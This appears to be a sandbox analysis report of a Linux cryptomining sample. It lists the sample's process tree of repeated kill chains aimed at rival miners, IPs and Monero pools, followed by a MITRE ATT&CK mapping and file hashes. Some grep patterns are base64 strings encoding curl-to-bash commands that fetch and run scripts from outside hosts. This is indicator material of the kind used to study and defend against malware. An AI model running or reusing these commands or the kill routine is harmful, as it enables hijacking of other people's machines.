/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2223

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2232

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2231

/bin/grep
grep 89.35.39.78
2⤵
PID:2230

/bin/grep
grep -v grep
2⤵
PID:2229

/bin/ps
ps aux
2⤵
PID:2228

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2237

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2236

/bin/grep
grep /dev/shm/z3.sh
2⤵
PID:2235

/bin/grep
grep -v grep
2⤵
PID:2234

/bin/ps
ps aux
2⤵
PID:2233

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2242

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2241

/bin/grep
grep kthrotlds
2⤵
PID:2240

/bin/grep
grep -v grep
2⤵
PID:2239

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2238

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2247

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2246

/bin/grep
grep ksoftirqds
2⤵
PID:2245

/bin/grep
grep -v grep
2⤵
PID:2244

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2243

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2252

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2251

/bin/grep
grep netdns
2⤵
PID:2250

/bin/grep
grep -v grep
2⤵
PID:2249

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2248

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2257

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2256

/bin/grep
grep watchdogs
2⤵
PID:2255

/bin/grep
grep -v grep
2⤵
PID:2254

/bin/ps
ps aux
2⤵
PID:2253

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2269

/usr/bin/awk
awk "\$3>80.0{print \$2}"
2⤵
PID:2268

/bin/grep
grep -v postgresq1
2⤵
PID:2267

/bin/grep
grep -v atd
2⤵
PID:2265

/bin/grep
grep -v kdevtmpfsi
2⤵
PID:2266

/bin/grep
grep -v apache2
2⤵
PID:2264

/bin/grep
grep -v dblaunched
2⤵
PID:2263

/bin/grep
grep -v dblaunchs
2⤵
PID:2262

/bin/grep
grep -v dblaunch
2⤵
PID:2261

/bin/grep
grep -v root
2⤵
PID:2260

/bin/grep
grep -v grep
2⤵
PID:2259

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2258

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2275

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2274

/bin/grep
grep " ps"
2⤵
PID:2273

/bin/grep
grep -v aux
2⤵
PID:2272

/bin/grep
grep -v grep
2⤵
PID:2271

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2270

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2280

/usr/bin/cut
cut -c 9-15
2⤵
PID:2279

/bin/grep
grep sync_supers
2⤵
PID:2278

/bin/grep
grep -v grep
2⤵
PID:2277

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2276

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2285

/usr/bin/cut
cut -c 9-15
2⤵
PID:2284

/bin/grep
grep cpuset
2⤵
PID:2283

/bin/grep
grep -v grep
2⤵
PID:2282

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2281

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2291

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2290

/bin/grep
grep "x]"
2⤵
PID:2289

/bin/grep
grep -v aux
2⤵
PID:2288

/bin/grep
grep -v grep
2⤵
PID:2287

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2286

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2297

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2296

/bin/grep
grep "sh] <"
2⤵
PID:2295

/bin/grep
grep -v aux
2⤵
PID:2294

/bin/grep
grep -v grep
2⤵
PID:2293

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2292

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2303

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2302

/bin/grep
grep " \\[]"
2⤵
PID:2301

/bin/grep
grep -v aux
2⤵
PID:2300

/bin/grep
grep -v grep
2⤵
PID:2299

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2298

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2308

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2307

/bin/grep
grep /tmp/l.sh
2⤵
PID:2306

/bin/grep
grep -v grep
2⤵
PID:2305

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2304

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2313

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2312

/bin/grep
grep /tmp/zmcat
2⤵
PID:2311

/bin/grep
grep -v grep
2⤵
PID:2310

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2309

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2318

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2317

/bin/grep
grep hahwNEdB
2⤵
PID:2316

/bin/grep
grep -v grep
2⤵
PID:2315

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2314

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2323

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2322

/bin/grep
grep CnzFVPLF
2⤵
PID:2321

/bin/grep
grep -v grep
2⤵
PID:2320

/bin/ps
ps aux
2⤵
PID:2319

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2328

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2327

/bin/grep
grep CvKzzZLs
2⤵
PID:2326

/bin/grep
grep -v grep
2⤵
PID:2325

/bin/ps
ps aux
2⤵
PID:2324

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2333

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2332

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:2331

/bin/grep
grep -v grep
2⤵
PID:2330

/bin/ps
ps aux
2⤵
PID:2329

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2338

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2337

/bin/grep
grep /tmp/udevd
2⤵
PID:2336

/bin/grep
grep -v grep
2⤵
PID:2335

/bin/ps
ps aux
2⤵
PID:2334

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2343

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2342

/bin/grep
grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
2⤵
PID:2341

/bin/grep
grep -v grep
2⤵
PID:2340

/bin/ps
ps aux
2⤵
PID:2339

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2348

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2347

/bin/grep
grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
2⤵
PID:2346

/bin/grep
grep -v grep
2⤵
PID:2345

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2344

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2353

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2352

/bin/grep
grep sustse
2⤵
PID:2351

/bin/grep
grep -v grep
2⤵
PID:2350

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2349

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2358

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2357

/bin/grep
grep sustse3
2⤵
PID:2356

/bin/grep
grep -v grep
2⤵
PID:2355

/bin/ps
ps aux
2⤵
PID:2354

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2364

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2363

/bin/grep
grep wget
2⤵
PID:2362

/bin/grep
grep mr.sh
2⤵
PID:2361

/bin/grep
grep -v grep
2⤵
PID:2360

/bin/ps
ps aux
2⤵
PID:2359

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2370

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2369

/bin/grep
grep curl
2⤵
PID:2368

/bin/grep
grep mr.sh
2⤵
PID:2367

/bin/grep
grep -v grep
2⤵
PID:2366

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2365

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2376

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2375

/bin/grep
grep wget
2⤵
PID:2374

/bin/grep
grep 2mr.sh
2⤵
PID:2373

/bin/grep
grep -v grep
2⤵
PID:2372

/bin/ps
ps aux
2⤵
PID:2371

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2382

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2381

/bin/grep
grep curl
2⤵
PID:2380

/bin/grep
grep 2mr.sh
2⤵
PID:2379

/bin/grep
grep -v grep
2⤵
PID:2378

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2377

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2388

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2387

/bin/grep
grep wget
2⤵
PID:2386

/bin/grep
grep cr5.sh
2⤵
PID:2385

/bin/grep
grep -v grep
2⤵
PID:2384

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2383

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2394

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2393

/bin/grep
grep curl
2⤵
PID:2392

/bin/grep
grep cr5.sh
2⤵
PID:2391

/bin/grep
grep -v grep
2⤵
PID:2390

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2389

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2400

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2399

/bin/grep
grep wget
2⤵
PID:2398

/bin/grep
grep logo9.jpg
2⤵
PID:2397

/bin/grep
grep -v grep
2⤵
PID:2396

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2395

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2406

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2405

/bin/grep
grep curl
2⤵
PID:2404

/bin/grep
grep logo9.jpg
2⤵
PID:2403

/bin/grep
grep -v grep
2⤵
PID:2402

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2401

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2411

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2410

/bin/grep
grep j2.conf
2⤵
PID:2409

/bin/grep
grep -v grep
2⤵
PID:2408

/bin/ps
ps aux
2⤵
PID:2407

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2417

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2416

/bin/grep
grep wget
2⤵
PID:2415

/bin/grep
grep luk-cpu
2⤵
PID:2414

/bin/grep
grep -v grep
2⤵
PID:2413

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2412

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2423

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2422

/bin/grep
grep curl
2⤵
PID:2421

/bin/grep
grep luk-cpu
2⤵
PID:2420

/bin/grep
grep -v grep
2⤵
PID:2419

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2418

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2429

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2428

/bin/grep
grep wget
2⤵
PID:2427

/bin/grep
grep ficov
2⤵
PID:2426

/bin/grep
grep -v grep
2⤵
PID:2425

/bin/ps
ps aux
2⤵
PID:2424

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2435

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2434

/bin/grep
grep curl
2⤵
PID:2433

/bin/grep
grep ficov
2⤵
PID:2432

/bin/grep
grep -v grep
2⤵
PID:2431

/bin/ps
ps aux
2⤵
PID:2430

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2441

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2440

/bin/grep
grep wget
2⤵
PID:2439

/bin/grep
grep he.sh
2⤵
PID:2438

/bin/grep
grep -v grep
2⤵
PID:2437

/bin/ps
ps aux
2⤵
PID:2436

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2447

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2446

/bin/grep
grep curl
2⤵
PID:2445

/bin/grep
grep he.sh
2⤵
PID:2444

/bin/grep
grep -v grep
2⤵
PID:2443

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2442

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2453

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2452

/bin/grep
grep wget
2⤵
PID:2451

/bin/grep
grep miner.sh
2⤵
PID:2450

/bin/grep
grep -v grep
2⤵
PID:2449

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2448

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2459

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2458

/bin/grep
grep curl
2⤵
PID:2457

/bin/grep
grep miner.sh
2⤵
PID:2456

/bin/grep
grep -v grep
2⤵
PID:2455

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2454

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2465

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2464

/bin/grep
grep wget
2⤵
PID:2463

/bin/grep
grep nullcrew
2⤵
PID:2462

/bin/grep
grep -v grep
2⤵
PID:2461

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2460

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2471

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2470

/bin/grep
grep curl
2⤵
PID:2469

/bin/grep
grep nullcrew
2⤵
PID:2468

/bin/grep
grep -v grep
2⤵
PID:2467

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2466

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2476

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2475

/bin/grep
grep 107.174.47.156
2⤵
PID:2474

/bin/grep
grep -v grep
2⤵
PID:2473

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2472

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2481

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2480

/bin/grep
grep 83.220.169.247
2⤵
PID:2479

/bin/grep
grep -v grep
2⤵
PID:2478

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2477

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2486

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2485

/bin/grep
grep 51.38.203.146
2⤵
PID:2484

/bin/grep
grep -v grep
2⤵
PID:2483

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2482

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2491

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2490

/bin/grep
grep 144.217.45.45
2⤵
PID:2489

/bin/grep
grep -v grep
2⤵
PID:2488

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2487

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2496

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2495

/bin/grep
grep 107.174.47.181
2⤵
PID:2494

/bin/grep
grep -v grep
2⤵
PID:2493

/bin/ps
ps aux
2⤵
PID:2492

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2501

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2500

/bin/grep
grep 176.31.6.16
2⤵
PID:2499

/bin/grep
grep -v grep
2⤵
PID:2498

/bin/ps
ps aux
2⤵
PID:2497

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2506

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2505

/bin/grep
grep mine.moneropool.com
2⤵
PID:2504

/bin/grep
grep -v grep
2⤵
PID:2503

/bin/ps
ps auxf
2⤵
PID:2502

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2511

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2510

/bin/grep
grep pool.t00ls.ru
2⤵
PID:2509

/bin/grep
grep -v grep
2⤵
PID:2508

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2507

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2516

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2515

/bin/grep
grep xmr.crypto-pool.fr:8080
2⤵
PID:2514

/bin/grep
grep -v grep
2⤵
PID:2513

/bin/ps
ps auxf
2⤵
PID:2512

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2521

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2520

/bin/grep
grep xmr.crypto-pool.fr:3333
2⤵
PID:2519

/bin/grep
grep -v grep
2⤵
PID:2518

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
PID:2517

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2526

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2525

/bin/grep
grep "[email protected]"
2⤵
PID:2524

/bin/grep
grep -v grep
2⤵
PID:2523

/bin/ps
ps auxf
2⤵
PID:2522

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2531

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2530

/bin/grep
grep monerohash.com
2⤵
PID:2529

/bin/grep
grep -v grep
2⤵
PID:2528

/bin/ps
ps auxf
2⤵
PID:2527

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2536

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2535

/bin/grep
grep /tmp/a7b104c270
2⤵
PID:2534

/bin/grep
grep -v grep
2⤵
PID:2533

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:2532

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2541

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2540

/bin/grep
grep xmr.crypto-pool.fr:6666
2⤵
PID:2539

/bin/grep
grep -v grep
2⤵
PID:2538

/bin/ps
ps auxf
2⤵
PID:2537

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2546

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2545

/bin/grep
grep xmr.crypto-pool.fr:7777
2⤵
PID:2544

/bin/grep
grep -v grep
2⤵
PID:2543

/bin/ps
ps auxf
2⤵
PID:2542

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2551

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2550

/bin/grep
grep xmr.crypto-pool.fr:443
2⤵
PID:2549

/bin/grep
grep -v grep
2⤵
PID:2548

/bin/ps
ps auxf
2⤵
- Reads runtime system information
PID:2547

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2556

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2555

/bin/grep
grep stratum.f2pool.com:8888
2⤵
PID:2554

/bin/grep
grep -v grep
2⤵
PID:2553

/bin/ps
ps auxf
2⤵
PID:2552

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2561

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2560

/bin/grep
grep xmrpool.eu
2⤵
PID:2559

/bin/grep
grep -v grep
2⤵
PID:2558

/bin/ps
ps auxf
2⤵
PID:2557

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2565

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit